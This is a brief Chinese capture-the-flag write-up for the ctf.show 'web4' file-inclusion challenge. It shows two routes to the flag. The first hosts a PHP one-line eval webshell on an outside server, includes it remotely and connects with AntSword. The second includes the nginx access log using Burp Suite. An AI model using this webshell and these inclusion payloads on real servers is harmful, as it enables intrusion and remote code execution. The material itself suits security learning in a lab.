ROSE笔记-ctf.show-web4-WP
ctf.show-web4
试以下伪协议
payload:/?url=php://input
页面显示错误
方法一:远程文件包含
打开一台携带web服务的云服务器,在目录下创建一个test.php,内容为一句话木马
<?php
@eval($_POST['1']);
?>
http://xxx/test.php .php文件后缀包含不了,故改成.html,发现能访问。
用中国蚁剑连接
打开文件管理,发现flag
方法二
查看当前服务器为
nginx/1.14.0 (Ubuntu)
构造payload进入日志目录
payload: /?url=/var/log/nginx/access.log和/?url=/var/log/nginx/error.log
其中access.log可以打开,使用对该请求burpsuite抓包
依然找到flag